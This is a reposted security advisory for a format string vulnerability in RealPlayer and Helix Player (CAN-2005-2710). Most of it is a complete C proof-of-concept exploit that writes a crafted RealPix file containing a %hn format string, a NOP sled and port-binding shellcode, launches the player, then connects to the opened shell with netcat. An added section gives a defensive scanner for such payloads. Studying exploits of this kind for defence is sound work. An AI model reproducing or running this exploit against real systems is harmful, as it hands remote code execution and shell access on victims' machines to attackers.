RealPlayer and Helix Player Format String Handling Vulnerability

Author: anonymous  Source: unknown  Updated: 2007-1-25 11:24:39
Affected systems:
Real Networks RealPlayer 10 Japanese
Real Networks RealPlayer 10 German
Real Networks RealPlayer 10 for Linux
Real Networks RealPlayer 10 English
Real Networks Helix Player for Linux 1.0.4
Real Networks Helix Player for Linux 1.0.3
Real Networks Helix Player for Linux 1.0.2
Real Networks Helix Player for Linux 1.0.1
Real Networks Helix Player for Linux 1.0
Real Networks RealPlayer For Unix 10.0.4
Real Networks RealPlayer For Unix 10.0.3

Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 14945
CVE(CAN) ID: CAN-2005-2710
RealPlayer and Helix Player are both very popular media players that support many media formats.
RealPlayer and Helix Player contain a format string vulnerability that a remote attacker may be able to exploit to take control of the machine.
The root cause is missing validation of user input. A remote attacker can use this flaw to pass format specifiers directly to a formatted printing function, leading to execution of arbitrary code.
<*Source: c0ntex (c0ntex@hushmail.com)
  Links: http://lwn.net/Alerts/153346/?format=printable
         http://lwn.net/Alerts/153347/?format=printable
*>

Test method:
--------------------------------------------------------------------------------

Warning
The following program (method) may be offensive in nature and is provided for security research and teaching only. Users proceed at their own risk!
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFFER   10000
#define EBPMSB   64105
#define HOST     "localhost"
#define NETCAT   "/bin/nc"
#define NOPS     0x90
#define STACKPOP 148
#define VULN     "/usr/local/RealPlayer/realplay"

/* nine raw bytes used as the file name; the last three are ".rp" */
char filename[] = "\x56\x59\x14\x82\x26\x08\x2e\x72\x70";

/* metasploit port binding shellcode = 4444 */
char hellcode[] =
    "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66"
    "\x58\x99\x89\xe1\xcd\x80\x96\x43\x52"
    "\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a"
    "\x66\x58\x50\x51\x56\x89\xe1\xcd\x80"
    "\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56"
    "\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a"
    "\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9"
    "\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68"
    "\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89"
    "\xe1\xcd\x80";

/* write the RealPix (.rp) file whose <image handle> attribute carries
 * the format string "%.<EBPMSB>u%<STACKPOP>$hn" followed by the payload */
int filegen(char *shellcode)
{
    FILE *rp;

    printf("[-] Creating file [%s]\n", filename);

    rp = fopen(filename, "w");
    if(!rp) {
        puts("[!] Could not fopen file!");
        free(shellcode);
        return(EXIT_FAILURE);
    }

    printf("[-] Using [%d] stack pops\n[-] Modifying EBP MSB with value [%d]\n",
           STACKPOP, EBPMSB);

    fprintf(rp,
        "<imfl>\n"
        "<head\n"
        "duration=\"1:33.7\"\n"
        "timeformat=\"dd:hh:mm:ss.xyz\"\n"
        "preroll=\"1:33.7\"\n"
        "bitrate=\"1337\"\n"
        "width=\"69\"\n"
        "height=\"69\"\n"
        "aspect=\"\"\n"
        "url=\"http://www.open-security.org\"/>\n"
        "<image handle=\"%%.%du%%%d$hn\" name=\"findme%s\"/>\n"
        "<fadein start=\"0\" duration=\"0:01\" target=\"2\"/>\n"
        "</imfl>",
        EBPMSB, STACKPOP, shellcode);
    fclose(rp);

    free(shellcode);
    shellcode = NULL;

    return(EXIT_SUCCESS);
}

int main(int argc, char **argv)
{
    char *shellcode = NULL;

    puts("\nRemote format string exploit POC for UNIX RealPlayer && HelixPlayer");
    puts("Code tested on Debian 3.1 against RealPlayer 10 Gold's latest version");
    puts("by c0ntex || c0ntexb@gmail.com || http://www.open-security.org\n");

    /* one extra byte so the terminating NUL written below stays in bounds */
    shellcode = (char *)malloc(BUFFER + 1);
    if(!shellcode) {
        puts("[!] Could not malloc");
        return(EXIT_FAILURE);
    }

    /* NOP sled followed by the shellcode at the very end of the buffer */
    memset(shellcode, NOPS, BUFFER);
    memcpy(&shellcode[BUFFER - strlen(hellcode)], hellcode, strlen(hellcode));
    shellcode[BUFFER] = '\0';

    if(filegen(shellcode) != EXIT_SUCCESS)
        return(EXIT_FAILURE);

    puts("[-] Completed creation of test file!\n[-] Executing RealPlayer now...");

    switch(fork()) {
        case -1:
            puts("[!] Could not fork off, bailing!");
            return(EXIT_FAILURE);
        case 0:
            if(execl(VULN, "realplay", filename, (char *)NULL) < 0) {
                puts("[!] Could not execute realplayer... :(");
                return(EXIT_FAILURE);
            }
        default:
            break;
    }

    puts("[-] Connecting to shell in 10 seconds\n** YOU MIGHT HAVE TO HIT RETURN ON REALPLAYER WINDOW **");
    sleep(10);

    if(execl(NETCAT, "nc", HOST, "4444", (char *)NULL) < 0) {
        puts("[!] Could not connect, check the core file!");
        return(EXIT_FAILURE);
    }

    return(EXIT_SUCCESS);
}
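As an added defensive illustration (not code from the advisory, from c0ntex, or from RealNetworks): a bounded scanner that flags RealPix `handle` attributes carrying a memory-writing conversion (`%n` and its length-modified forms), run over a constructed .rp sample whose second handle has the `%.<width>u%<k>$hn` shape the PoC above writes. The function names and the sample file are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* The bug class, as a comment only: attacker data must never be the format itself.
 *   vulnerable: snprintf(buf, sizeof buf, handle);
 *   hardened:   snprintf(buf, sizeof buf, "%s", handle);                          */

/* Constructed RealPix sample (not from the advisory): one benign handle and one
 * carrying the %.<width>u%<k>$hn shape the PoC above writes into the file. */
static const char SAMPLE_RP[] =
    "<imfl>\n"
    "<image handle=\"1\" name=\"cover.jpg\"/>\n"
    "<image handle=\"%.64105u%148$hn\" name=\"findme\"/>\n"
    "</imfl>\n";

/* Return 1 if s[0..len) holds a memory-writing conversion (%n, %hn, %hhn, %ln, ...
 * with optional positional k$, flags, width and precision), else 0. Bounded by
 * len so an unterminated or oversized attribute cannot overrun the buffer. */
int has_write_directive(const char *s, size_t len)
{
    size_t i = 0;
    while (i < len) {
        if (s[i++] != '%') continue;
        if (i < len && s[i] == '%') { i++; continue; }     /* literal "%%" */
        while (i < len && s[i] && (isdigit((unsigned char)s[i]) || strchr("$.-+ #*", s[i])))
            i++;                                            /* k$, flags, width, precision */
        while (i < len && s[i] && strchr("hlLqjzt", s[i]))
            i++;                                            /* length modifiers */
        if (i < len && s[i] == 'n') return 1;
    }
    return 0;
}

/* Count handle="..." attributes in an .rp body that carry a write directive;
 * 0 means no %n-style payload sits in that attribute. */
int count_unsafe_handles(const char *rp)
{
    static const char needle[] = "handle=\"";
    int unsafe = 0;
    for (const char *p = strstr(rp, needle); p; p = strstr(p, needle)) {
        p += sizeof needle - 1;                    /* skip past the opening quote */
        const char *end = strchr(p, '"');
        if (!end) break;                           /* unterminated attribute: stop */
        unsafe += has_write_directive(p, (size_t)(end - p));
        p = end;
    }
    return unsafe;
}
```

A file that scores above zero should be quarantined for inspection rather than opened; a clean score only says this one attribute is free of write directives, not that the file is safe.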
Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

Real Networks
-------------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:

http://www.real.com

[Reposted from Century Security Net, http://www.21safe.com]